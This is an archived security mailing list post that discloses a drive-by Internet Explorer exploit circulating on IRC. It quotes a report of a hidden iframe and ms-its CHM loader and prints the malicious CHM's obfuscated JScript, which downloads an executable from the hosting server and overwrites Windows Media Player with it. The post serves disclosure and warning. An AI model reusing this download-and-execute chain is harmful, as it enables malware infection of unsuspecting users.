| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: fharvey at securiweb.net (François Harvey)
Subject: IE exploit going around on irc
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
source of the jscript inside the chm
have a nice day
<SCRIPT LANGUAGE="javascript">
~ function getPath(url) {
~ start = url.indexOf('http:')
~ end = url.indexOf('LOI.CHM')
~ return url.substring(start, end);
~ }
~ tehaa = 'ADO' + 'DB' + '.St' + 'ream';
~ tehao = 'Micro' + 'soft.XM' + 'LHTTP';
~ tehex = '.exe';
~ tehwmp = 'C:\\Pr' + 'ogram Files\\Win' + 'dows Media Player\\wmpl'
+ 'ayer' + tehex;
~ tehmms = 'm' + 'm' + 's' + ':/' + '/';
~ var tehf = new ActiveXObject(tehaa);
~ tehf.Mode = 3;
~ tehf.Type = 1;
~ tehgURLf = getPath(location.href)+'loi' + tehex;
~ var tehg = new ActiveXObject(tehao);
~ tehg.Open("GET",tehgURLf,0);
~ tehg.Send();
~ tehf.Open();
~ tehf.Write(tehg.responseBody);
~ tehf.SaveToFile(tehwmp,2);
~ location.href = tehmms;
</SCRIPT>
Francois Harvey
SecuriWeb inc.
Niek Baakman a ?crit :
| Hi list,
|
| this thing's been going around on irc the last few days:
|
| www.divx.dc-hub.com (IE users don't click it!) check source:
| <iframe src='loi.htm' width=0 height=0></iframe>
|
| loi.htm contains: <object
| data="ms-its:mhtml:file://C:\winhelp.mht!${PATH}/LOI.CHM::/loi.htm"
| type="text/x-scriptlet"></object>
|
|
| LOI.CHM is attached
|
| Regards,
|
| Niek Baakman
|
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (MingW32)
iD8DBQFAca0ebw9u6+cJxl4RAphzAJ9TRgSBuaPatVFbXBfzqBoKmbrHCACeJ/X8
FZvzRZU2LDEPQyJ0lVMXWiQ=
=Bvkg
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists